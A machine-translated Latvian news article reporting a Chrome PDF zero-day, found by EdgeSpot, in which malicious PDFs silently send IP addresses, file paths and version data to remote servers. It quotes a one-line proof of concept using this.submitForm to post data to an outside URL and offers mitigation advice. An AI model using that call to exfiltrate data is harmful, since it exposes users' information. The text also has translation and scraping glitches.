Chrome ievainojamība ļauj hakeriem vākt lietotāju datus, izmantojot pdf failus
Satura rādītājs:
Video: Kaip ištrinti laikinus failus (Cache) iš Internet Explorer 2024
Izmantojiet atklāšanas pakalpojumu EdgeSpot atklāja intriģējošu Chrome nulles dienas ievainojamību, izmantojot PDF dokumentus. Ievainojamība ļauj uzbrucējiem novākt sensitīvu informāciju, izmantojot ļaunprātīgus PDF dokumentus, kas atvērti pārlūkā Chrome.
Tiklīdz upuris atver attiecīgos PDF failus pārlūkā Google Chrome, ļaunprātīga programma sāk darboties fonā, apkopojot lietotāja datus.
Pēc tam dati tiek pārsūtīti uz attālo serveri, kuru kontrolē hakeri. Jums varētu rasties jautājums, kādus datus uzbrucēji sūc, un tie jūsu datorā mērķē uz šādiem datiem:
- IP adrese
- Pilns PDF faila ceļš sistēmā
- OS un Chrome versijas
Sargieties no ļaunprātīgas programmatūras pārņemtiem PDF failiem
Jūs varētu būt pārsteigts, uzzinot, ka nekas nenotiek, ja Adobe Reader tiek izmantots PDF failu atvēršanai. Turklāt HTTP POST pieprasījumus izmanto datu pārsūtīšanai uz attālajiem serveriem bez lietotāja iejaukšanās.
Eksperti pamanīja, ka datus saņem viens no diviem domēniem readnotifycom vai burpcollaboratornet.
Varat iedomāties uzbrukuma intensitāti, ņemot vērā faktu, ka lielākā daļa pretvīrusu programmatūras nespēj atklāt EdgeSpot atklātos paraugus.
Eksperti atklāj, ka uzbrucēji izmanto “this.submitForm ()” PDF Javascript API, lai apkopotu sensitīvu lietotāju informāciju.
Mēs to pārbaudījām ar minimālu PoC, vienkāršs API zvans, piemēram, “this.submitForm ('http://google.com/test')”, liks Google Chrome nosūtīt personiskos datus vietnei google.com.
Eksperti faktiski uzzināja, ka šo Chrome kļūdu izmanto divas atšķirīgas kaitīgo PDF failu kopas. Abas no tām tika izplatītas attiecīgi 2017. gada oktobrī un 2018. gada septembrī.
Proti, uzbrucēji apkopotos datus var izmantot, lai nākotnē pielāgotu uzbrukumus. Pārskati liecina, ka pirmā failu partija tika apkopota, izmantojot ReadNotify PDF izsekošanas pakalpojumu.
Lietotāji var izmantot pakalpojumu, lai sekotu lietotāju skatījumiem. EdgeSpot nav kopīgojis nekādu informāciju par PDF failu otrās kopas raksturu.
Kā saglabāt aizsardzību
Ekspluatācijas atklāšanas pakalpojums EdgeSpot vēlējās brīdināt lietotājus Chrome lietotājus par iespējamiem riskiem, jo nav paredzēts, ka tuvākajā nākotnē tiks izlaists plāksteris.
EdgeSpot pagājušajā gadā ziņoja Google par ievainojamību, un uzņēmums solīja aprīļa beigās atbrīvot plāksteri. H
Tomēr varat apsvērt iespēju īslaicīgi novērst problēmu, lokāli apskatot saņemtos PDF dokumentus, izmantojot alternatīvu PDF lasītāja lietotni.
Varat arī atvērt PDF failus pārlūkā Chrome, atvienojot sistēmas no interneta. Tikmēr jūs varat gaidīt pārlūka Chrome 74 atjauninājumu, kuru paredzēts ieviest 23. aprīlī.
Ti, ievainojamība, kas ļauj uzbrucējiem pamanīt failus uz jūsu diska, tika labota
Otrdien veiktie februāra ielāpa labojumi nosaka fiksētu drošības ievainojamību, kas ļauj hakeriem redzēt, kādus failus jūs saglabājāt savā diskā.
Outlook ievainojamība ļauj hakeriem nozagt paroli
Microsoft Outlook ir viena no populārākajām e-pasta platformām pasaulē. Es personīgi paļaujos uz manu Outlook e-pasta adresi ar darbu saistītos, kā arī personiskos uzdevumos. Diemžēl programma Outlook var nebūt tik droša, kā mēs domājam lietotāji. Saskaņā ar Kārnegi Melona programmatūras inženierijas institūta publicēto ziņojumu, Outlook…
Pārtrauciet google un facebook vākt savus personiskos datus
Vai jūs zinājāt, ka 76% visu vietņu slēpj Google izsekotājus un 24% iesaiņo paslēptos Facebook izsekotājus? Nu, ir pienācis laiks, kad jūs to uzzinājāt. Šie ir svarīgi dati, kas iegūti Prinstonas tīmekļa pārredzamības un atbildības projektā. Šo divu lielo uzņēmumu ietekme uz mūsu privātumu ir milzīga, un mēs to nevaram novērtēt par zemu. Slēptie izsekotāji parasti…